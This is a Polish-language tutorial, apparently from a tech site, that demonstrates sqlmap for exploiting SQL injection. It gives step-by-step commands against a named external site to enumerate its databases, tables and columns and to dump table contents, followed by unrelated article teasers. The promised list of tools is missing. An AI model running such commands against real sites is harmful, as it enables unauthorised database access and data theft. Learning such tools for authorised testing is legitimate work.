W tej sekcji LuckyTemplates przedstawi Ci niektóre narzędzia używane do wykorzystania SQL Injection .
Obecnie istnieje wiele narzędzi do skanowania podatności w zabezpieczeniach (w tym wstrzykiwanie SQL). Narzędzia te pozwalają dość skutecznie wykrywać i wykorzystywać luki w zabezpieczeniach polegające na wstrzykiwaniu SQL. Niektóre powszechnie używane narzędzia do wykorzystywania luk w zabezpieczeniach automatycznego wstrzykiwania SQL obejmują:
Istnieje również kilka innych narzędzi, do których możesz się odwołać, takich jak: Netsparker, jSQL Injection, Burp, BBQSQL...
Poniżej znajduje się demonstracja użycia Sqlmap do wykorzystania podstawowego wstrzykiwania SQL.
Pobierasz Sqlmap pod adresem http://sqlmap.org/
Sqlmap jest napisany w języku Python, więc aby korzystać z tego narzędzia, musisz zainstalować Python. Pythona możesz pobrać pod adresem http://www.python.org/downloads/
Najpierw musisz zidentyfikować docelową witrynę internetową, tutaj mam następujący cel: http://zerocoolhf.altervista.org/level1.php?id=1 (ta strona jest już martwa).
Krok 1 : Otwórz cmd i wpisz następujące polecenie:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap wykryje lukę w zabezpieczeniach celu i dostarczy informacje o luce.
Krok 2 : Po ustaleniu, że docelowa witryna internetowa zawiera lukę w zabezpieczeniach polegającą na wstrzykiwaniu SQL, przystępujemy do wyszukiwania nazwy bazy danych.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Baza danych: my_zerocoolhf
Krok 3 : Po ustaleniu nazwy bazy danych będziemy kontynuować wyszukiwanie nazw tabel w bazie danych.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> W bazie danych znajdują się 2 tabele: auth i book
Krok 4 : Określ nazwy kolumn w tabeli
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Zidentyfikuj kolumny w tabeli książki: autor, identyfikator, cena, tytuł.
Krok 5 : Zrzuć dane z tabeli.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> W ten sposób uzyskaliśmy bazę danych docelowej strony internetowej.
Powyżej znajduje się podstawowe demo użycia sqlmap do wykorzystania błędów iniekcji SQL. Więcej informacji o opcjach sqlmap można znaleźć na stronie https://github.com/sqlmapproject/sqlmap/wiki/Usage do obsługi exploitów. Exploit iniekcji SQL.
Czy widzisz powiadomienie o aktywacji systemu Windows 10 w prawym rogu ekranu? W tym artykule dowiesz się, jak usunąć powiadomienie o żądaniu dotyczącym praw autorskich w systemie Windows 10.
Niedawno firma Microsoft wydała najnowszą aktualizację zbiorczą dla użytkowników komputerów PC z systemem Windows 10 o nazwie Build 14393.222. Ta aktualizacja wydana dla systemu Windows 10 naprawia głównie błędy na podstawie opinii użytkowników i poprawia wydajność systemu operacyjnego.
Czy masz komputery w sieci lokalnej, które wymagają dostępu zewnętrznego? Dobrym rozwiązaniem może być użycie hosta bastionowego jako strażnika sieci.
Czasami może być konieczne jednoczesne usunięcie wszystkich starych dzienników zdarzeń. W tym przewodniku Quantrimang.com pokaże Ci 3 sposoby szybkiego usunięcia wszystkich dzienników zdarzeń w Podglądzie zdarzeń systemu Windows 10.
Jeśli wolisz używać starej, klasycznej klawiatury, takiej jak IBM Model M, która nie zawiera fizycznego klawisza Windows, istnieje prosty sposób, aby dodać więcej, pożyczając klawisz, którego nie używasz często.
WindowTop to narzędzie, które ma możliwość przyciemnienia wszystkich okien aplikacji i programów działających na komputerach z systemem Windows 10. Możesz także użyć interfejsu z ciemnym tłem w systemie Windows.
W wielu poprzednich artykułach wspominaliśmy, że zachowanie anonimowości w Internecie jest niezwykle ważne. Co roku dochodzi do wycieku prywatnych informacji, co sprawia, że bezpieczeństwo w Internecie staje się coraz bardziej konieczne. Z tego też powodu powinniśmy używać wirtualnych adresów IP. Poniżej dowiemy się o metodach tworzenia fałszywych adresów IP!
Pasek języka w systemie Windows 8 to miniaturowy pasek narzędzi języka, zaprojektowany tak, aby automatycznie wyświetlał się na ekranie komputera stacjonarnego. Jednak wiele osób chce ukryć ten pasek języka na pasku zadań.
Maksymalizacja szybkości Internetu jest niezbędna do optymalizacji połączenia sieciowego. Możesz cieszyć się optymalną rozrywką i pracą, korzystając z komputerów, telewizorów z dostępem do Internetu, konsol do gier itp.
Łączność bezprzewodowa jest dziś koniecznością i dlatego bezpieczeństwo sieci bezprzewodowej jest niezbędne do zapewnienia bezpieczeństwa w sieci wewnętrznej.
